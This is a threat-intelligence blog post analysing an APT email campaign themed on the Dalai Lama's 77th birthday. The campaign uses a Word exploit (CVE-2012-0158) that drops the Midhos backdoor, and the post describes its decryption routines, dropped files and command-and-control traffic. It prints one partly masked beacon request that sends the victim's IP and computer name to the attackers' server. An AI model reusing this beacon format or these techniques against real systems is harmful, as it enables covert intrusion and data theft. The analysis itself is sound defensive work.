A Gift for Dalai Lama’s Birthday

Recently, we wrote about Dalai Lama being a frequent Mac user. While this is true for his holiness, not all his supporters use Macs yet.

You may wonder why is this relevant? Well, on 6th of July, his holiness will be 77 years old, a kind of round number. There is no surprise that “Dalai Lama Birthday” attacks are already ongoing.

On July 3rd, we’ve noticed a new APT campaign entitled “Dalai Lama’s birthday on July 6 to be low-key affair”:

Attached to the e-mail there is a .DOC file which exploits CVE-2012-0158, a very common theme for these attacks. (see New APT Attack Shows Technical Advance in Exploit Development)

This time, the exploit is for Windows based computers.

The x86 shellcode in the .DOC file decrypts the main backdoor body in blocks of 1KB with a simple “xor pos + ror 3” cipher:

Once the main backdoor body is decrypted, it is dropped to disk as “CONIME.EXE”. This further drops a DLL (CONIME.DLL) and a configuration file (CONIME.INF). We currently detect the two dropped components as Trojan.Win32.Midhos:

CONIME.dll detected as Trojan.Win32.Midhos.fuy

CONIME.exe detected as Trojan.Win32.Midhos.fuz

The DLL implements the main backdoor functionality through three exported functions:

• CommunicateToClient
• InstallProgram
• RunProgram

Just like in other cases, the backdoor configuration file (CONIME.INF) is encrypted:

The encryption algorithm here is different; it’s a loop which performs a XOR with a variable key.

Once decrypted, the backdoor config can be read:

The Command and Control server address (61.178.77.*) is exactly the same one used in a previous attack we analyzed. (see “New MacOS X backdoor variant used in APT attacks”)

The backdoor attempts to connect to the C2 via HTTP on port 1080, to a server side module named WinData{UWXYZ}.Dll:

Here’s a full HTTP request:

GET http://61.178.77.*:1080/WinData1158.Dll?HELO-STX-2*IP_ADDR*COMPUTERNAME*$ HTTP/1.0

In reply, the server answers with encrypted packets containing commands to the backdoor.

When the exploit is successful, a “fake” document is displayed instead, which contains an article ripped from “The Tribune, Chandigarh”, an Indian newspaper. The original article is written by “Lalit Mohan”:

Conclusion

High profile personalities like Tenzin Gyatso, the current Dalai Lama, are constant targets for APT attackers. With Dalai Lama’s 77th birthday coming up on July 6, we expect such attacks to intensify.

For the past month we’ve seen almost 500 reports of Trojan.Win32.Midhos, which is a family of backdoors used by these particular APT attackers.

The vast majority of victims are located in USA, Italy, Canada, UK and Germany.

Additionally, we have pointed in the past that many of these APT (Advanced Persistent Threat) attacks are not exactly “advanced”. In many cases, they are not so “persistent” either – they get detected very quickly by antivirus products and removed from the systems.

But one thing they are for sure – insistent.